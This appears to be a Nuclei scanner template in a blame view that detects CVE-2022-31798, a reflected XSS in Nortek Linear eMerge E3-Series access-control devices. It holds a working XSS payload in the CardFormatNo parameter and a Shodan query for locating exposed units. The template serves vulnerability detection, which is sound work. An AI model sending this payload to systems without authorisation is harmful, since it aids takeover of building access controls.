nuclei-templates/cves/2022/CVE-2022-31798.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2022-08-12 11:31:04 +00:00
id: CVE-2022-31798
info:
2022-08-13 00:01:54 +00:00
name: Nortek Linear eMerge E3-Series - XSS
2022-08-12 11:31:04 +00:00
author: ritikchaddha
severity: high
description: |
There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
reference:
- https://packetstormsecurity.com/files/167992/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
- https://eg.linkedin.com/in/omar-1-hashem
2022-08-12 11:31:04 +00:00
metadata:
shodan-query: http.title:"eMerge"
verified: "true"
2022-08-13 00:01:54 +00:00
tags: cve,cve2022,emerge,nortek,xss
2022-08-12 11:31:04 +00:00
requests:
- method: GET
path:
2022-08-13 00:01:54 +00:00
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
2022-08-12 11:31:04 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-13 00:01:54 +00:00
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
2022-08-12 11:31:04 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200